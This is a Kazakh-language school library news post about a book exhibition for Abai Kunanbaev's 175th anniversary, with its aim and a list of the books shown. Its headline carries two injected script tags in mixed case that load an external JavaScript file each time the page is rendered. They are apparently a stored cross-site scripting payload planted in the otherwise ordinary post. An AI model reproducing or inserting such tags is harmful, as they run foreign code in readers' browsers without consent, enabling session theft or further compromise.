«Ғ.Әбдірахманұлы атындағы Қима орта мектебі» КММ-нің кітапханасында «Абай мұрасы – ұрпаққа ұлағат» тақырыбында кітап көрмесін өткізді<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
14.10.2020
Биылғы жылы қазақ жазба әдебиетінің негізін қалаушы, қазақтың ұлы ақыны, ойшыл Абай Құнанбаевтың 175 жылдығына арналған іс-шаралардың ішінде мектеп кітапханада «Абай мұрасы – ұрпаққа ұлағат» тақырыбында кітап көрмесі ұйымдастырылды.
Кітап көрмесінің мақсаты: оқушыларға Абай атамыздың шығармалары мен кітаптарын, қара сөздерін, өлеңдерін насихаттау.
Көрмеге Абай атамыздың портреттері мен стенд, кітаптары, оқушылардың жасаған фото альбомдары қойылды.
Кітаптар тізімі:
- Абай
- Қазақ әдебиеті энциклпедиясы
- «Абай жолы» романы 1,2,3,4 томы
- Абай афоризмі
- Қазақ жазушылары анықтамасы
- Сен білесің бе?
- Тарихи тұлғалар
Қорытынды: Абай болашақ ұрпаққа тәрбие алатын мол мұра қалдырды. Сол мұраларына әр түрлі жанрлар, философиялық, моралистикалық лирика, сатирика мазмұнындағы өлеңдер, махаббат жолдаулары, поэмалар, «Қара сөздер» кіреді. Оқырмандар үшін көркем шығармалары, таңдамалы өлеңдер жинағы, қара сөздерінен адам бойына адамгершілік, парасаттылық, қайырылымдылық, жомарттық қасиеттерді сіңіруге маңыздылығы мол мұра.
Есенгулова Т.С.